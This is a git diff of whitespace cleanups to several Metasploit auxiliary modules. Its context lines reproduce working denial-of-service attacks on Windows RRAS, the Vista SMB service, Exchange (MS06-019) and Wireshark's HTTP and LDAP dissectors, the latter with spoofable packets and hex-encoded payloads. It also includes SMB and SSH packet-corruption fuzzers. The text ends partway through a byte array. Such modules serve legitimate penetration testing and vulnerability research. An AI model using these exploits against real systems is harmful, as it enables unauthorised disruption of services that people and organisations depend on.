diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index bf4d7c9943..09ec4417a3 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference', 'Description' => %q{ This module triggers a NULL dereference in svchost.exe on - all current versions of Windows that run the RRAS service. This + all current versions of Windows that run the RRAS service. This service is only accessible without authentication on Windows XP - SP1 (using the SRVSVC pipe). + SP1 (using the SRVSVC pipe). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary 'DefaultAction' => 'Attack', 'DisclosureDate' => 'Jun 14 2006' )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']), ], self.class) - + end def run connect smb_login - + case action.name when 'Attack' @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary dcerpc_bind(handle) print_status("Bound to #{handle} ...") stb = [0, 0, 0, 0].pack('V*') - + print_status("Calling the vulnerable function...") begin dcerpc.call(0x0C, stb) @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary raise e end end - + end disconnect 
diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index c54b618b37..81fcdc0416 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -1,10 +1,9 @@ - ## # $Id$ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary include Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS', 'Description' => %q{ This module exploits a flaw in Windows Vista that allows a remote unauthenticated attacker to disable the SMB service. This vulnerability was silently fixed in Microsoft Vista Service Pack 1. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' )) - + register_options([Opt::RPORT(445)], self.class) end @@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary # 100 requests ensure that the bug is reliably hit 1.upto(100) do |i| - + begin - + connect - + # 118 dialects are needed to trigger a non-response dialects = ['NT LM 0.12'] * 118 @@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary sock.put(pkt.to_s) disconnect - + rescue ::Interrupt raise $! - + rescue ::Exception print_status("Error at iteration #{i}: #{$!.class} #{$!}") return end - + end end -end +end diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 7152b242f2..bf770e9d80 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MS06-019 Exchange MODPROP Heap Overflow', 'Description' => %q{ This module triggers a heap overflow vulnerability in MS @@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains']) ], self.class) - + end # # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class # def run - + connect_login - modprops = ['attendee', 'categories', 'class', 'created', 'description', - 'dtstamp', 'duration', 'last-modified', + modprops = ['attendee', 'categories', 'class', 'created', 'description', + 'dtstamp', 'duration', 'last-modified', 'location', 'organizer', 'priority', 'recurrence-id', 'sequence', 'status', 'summary', 'transp', 'uid'] - + #modprops = ['dtstamp'] - + modpropshort = "" modpropbusted = "" modnum = rand(3) @@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8) - + # Really, the randomization above only crashes /sometimes/ - it's MUCH more # reliable, and gives crashes in better spots of you use these modprops: modpropshort = "dtstamp," modproplong = "dtstamp, dtstamp," modpropbusted = "DTSTAMP:\r\n" - + mail = "From: #{datastore['MAILFROM']}\r\n" mail << "To: #{datastore['MAILTO']}\r\n" mail << "Subject: #{datastore['SUBJECT']}\r\n" 
@@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary mail << "END:VCALENDAR\r\n" mail << "\r\n--#{boundry}\r\n" mail << "\r\n.\r\n" - - - print_status("Sending message...") + + + print_status("Sending message...") sock.put(mail) sock.put("QUIT\r\n") - print "<< " + sock.get_once + print "<< " + sock.get_once disconnect end diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 5fcbc57643..5cb4327675 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS', 'Description' => %q{ The PacketTrap TFTP server version 2.2.5459.0 can be diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 32d61fbdaf..35fd00528c 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireshark chunked_encoding_dissector function DOS', 'Description' => %q{ Wireshark crash when dissecting an HTTP chunked response. @@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'], ], 'DisclosureDate' => 'February 22 2007')) - + register_options([ OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) @@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 - + n.l4 = Racket::L4::TCP.new n.l4.dst_port = rand(65535)+1 n.l4.seq = rand(0x100000000) 
@@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = datastore['SPORT'].to_i n.l4.window = 3072 n.l4.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x
74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') - + + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + pkt = n.pack - + capture_sendto(pkt, rhost) close_pcap diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index 53c93466f6..a740f62399 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - + def initialize super( 'Name' => 'Wireshark LDAP dissector DOS', 
@@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary [ [ 'CVE', '2008-1562' ], ], - 'DisclosureDate' => 'Mar 28 2008') - + 'DisclosureDate' => 'Mar 28 2008') + register_options([ OptInt.new('RPORT', [true, 'The destination port', 389]), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) ], self.class) - + deregister_options('FILTER','PCAPFILE') end @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending malformed LDAP packet to #{rhost}") m = Rex::Text.rand_text_alpha_lower(3) - + open_pcap n = Racket::Racket.new @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 - + n.l4 = Racket::L4::TCP.new n.l4.src_port = rand(65535)+1 n.l4.seq = rand(0x100000000) @@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary n.l4.window = 3072 n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016" - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') - + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '') + pkt = n.pack capture_sendto(pkt, rhost) diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index b1afceb9a4..bab2830802 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Tree Connect Request Fuzzer', 
@@ -29,35 +29,35 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$' )) end - + def do_smb_connect(pkt,opts={}) @connected = false connect simple.login( - datastore['SMBName'], + datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'] - ) - + ) + @connected = true simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}") end - + def run last_str = nil last_inp = nil last_err = nil - + cnt = 0 fuzz_strings do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") end - + begin do_smb_connect(str, 0.25) rescue ::Interrupt @@ -68,16 +68,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index 4b201576d7..a4f6cafad0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SMB Tree Connect Request Corruption', 
@@ -32,48 +32,48 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBTREE', [true, 'Specify the tree name to corrupt', "\\\\SERVER\\IPC$"]) ], self.class) end - + def do_smb_tree(pkt,opts={}) @connected = false connect simple.login( - datastore['SMBName'], + datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'] ) - + @connected = true sock.put(pkt) sock.get_once(-1, opts[:timeout]) end - + def run - + # Connect in order to get the server-assigned user-id connect smb_login pkt = make_smb_tree disconnect - + last_str = nil last_inp = nil last_err = nil - + cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SMB tree connect with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_smb_tree(str, 0.25) rescue ::Interrupt @@ -84,29 +84,29 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + last_str = str last_inp = @last_fuzzer_input end end - + def make_smb_tree share = datastore['SMBTREE'] pass = '' data = [ pass, share, '?????' ].collect{ |a| a + "\x00" }.join(''); - + pkt = Rex::Proto::SMB::Constants::SMB_TREE_CONN_PKT.make_struct simple.client.smb_defaults(pkt['Payload']['SMB']) - + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0x2001 
diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 19ead57ff7..b99c755d9e 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer - + def initialize(info = {}) super(update_info(info, 'Name' => 'SSH Key Exchange Init Corruption', @@ -32,40 +32,40 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']) ], self.class) end - + def do_ssh_kexinit(pkt,opts={}) @connected = false connect @connected = true - + @banner = sock.get_once(-1,opts[:banner_timeout]) return if not @banner - + sock.put("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.put(pkt) sock.get_once(-1,opts[:kex_timeout]) end - + def run last_str = nil last_inp = nil last_err = nil - + pkt = make_kex_init cnt = 0 - + max = datastore['MAXDEPTH'].to_i max = nil if max == 0 tot = ( max ? [max,pkt.length].min : pkt.length) * 256 - + print_status("Fuzzing SSH initial key exchange with #{tot} requests") fuzz_string_corrupt_byte_reverse(pkt,max) do |str| cnt += 1 - + if(cnt % 100 == 0) print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}") end - + begin r = do_ssh_kexinit(str,:banner_timeout => 5, :kex_timeout => 0.5) rescue ::Interrupt 
@@ -76,16 +76,16 @@ class Metasploit3 < Msf::Auxiliary ensure disconnect end - + if(not @connected) if(last_str) print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}") else - print_status("Could not connect to the service: #{last_err}") + print_status("Could not connect to the service: #{last_err}") end return end - + if(not @banner) print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ") return 
@@ -95,106 +95,106 @@ class Metasploit3 < Msf::Auxiliary last_inp = @last_fuzzer_input end end - + def make_kex_init - [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, - 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, - 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, - 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, - 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, - 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, - 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, - 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, - 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, - 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, - 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, - 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, - 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, - 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, - 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, - 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, - 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, - 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, - 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, - 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, - 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, - 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, - 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, - 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, - 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, - 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, - 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, - 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, - 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, - 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, - 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, - 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, - 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, - 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, - 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, - 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, - 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, - 0x2e, 0x73, 0x65, 0x2c, 0x61, 
0x65, 0x73, 0x31, - 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, - 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, - 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, - 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, - 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, - 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, - 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, - 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, - 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, - 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, - 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, - 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, - 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, - 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, - 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, - 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, - 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, - 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, - 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, - 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, - 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, - 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, - 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, - 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, - 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, - 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, - 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, - 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, - 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, - 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, - 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, - 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, - 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, - 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, - 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, - 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, - 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x73, 
0x68, 0x61, 0x31, - 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, - 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, - 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, - 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, - 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, - 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, - 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, - 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, - 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, - 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, - 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, - 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, - 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, - 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, - 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, - 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, - 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, - 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, - 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, + 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, + 0x79, 0x6a, 0x03, 0x3d, 0xaf, 